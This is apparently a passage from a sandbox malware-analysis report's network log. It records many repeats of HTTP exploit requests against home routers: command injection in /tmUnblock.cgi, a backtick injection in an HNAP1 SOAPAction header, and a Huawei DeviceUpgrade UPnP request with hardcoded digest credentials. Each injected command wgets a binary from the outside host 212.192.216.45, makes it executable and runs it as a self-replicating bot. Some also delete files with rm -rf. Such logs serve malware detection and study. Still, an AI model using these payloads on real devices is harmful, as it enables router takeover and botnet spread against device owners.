| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
